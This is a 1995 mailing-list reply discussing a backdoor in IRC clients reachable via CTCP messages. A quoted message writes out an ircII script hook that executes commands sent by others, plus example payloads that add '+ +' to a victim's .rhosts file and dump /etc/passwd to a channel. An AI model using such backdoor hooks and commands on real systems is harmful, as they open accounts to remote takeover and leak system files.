On Fri, 3 Feb 1995, Kernel Panic wrote: > On Fri, 3 Feb 1995, Silicon Avatar wrote: > > > On Fri, 3 Feb 1995, Lorna Leong wrote: > > If you are talking about the "jupe" or "grok" hole. It was temporary, and > > merely hacked version of the client floating around at "trusted" sites. > > > > To my knowledge, these "hacks" have been removed and are no longer a threat > > (unless someone is propogating these older clients.) > > > > Simply put, you could "CTCP grok [command]" (CTCP being a method of > > communication over IRC) someone, and have that command executed, > > unknowingly, off the account. > > No, IRC holes are a more serious threat than you give then credit for. > For example, if I were to add to a script (or better yet make someone > type) the following: > > /on ^ctcp "% % JUPE" $3- > > They would be just as much in my control as if they were on a hacked client. > from this, you can do: > > /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts > > or > > /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd > > Theres more to IRC backdoors than making people say stupid stuff on a > channel. I hope this example clears that up a little. I never said the hole was limited to saying something on the channel. I said that command could be executed off that account. The *known* hole that was cert-released was what I described. What you describe is a lackage of knowledge in general ircII-scripting causing people to use other, unknown scripts. Often times, these scripts have their own backholes ... But this is not a hole generated at a "guaranteed" site. /----------------------------------------------------------------------\ <> Stephan K. Zitz <> My mind is my best friend... <> <> zitz@infinity.ivdev.com <> And my worst enemy... GABBPUY! <> <> Integrated Visions -- Watch out, is on its way.... <> \======================================================================/ GCS/M d-- p c++++ l+++ u++ e+ m-(++) s !n h++ f(++)* !g w+++ t+++ r+ y+(*)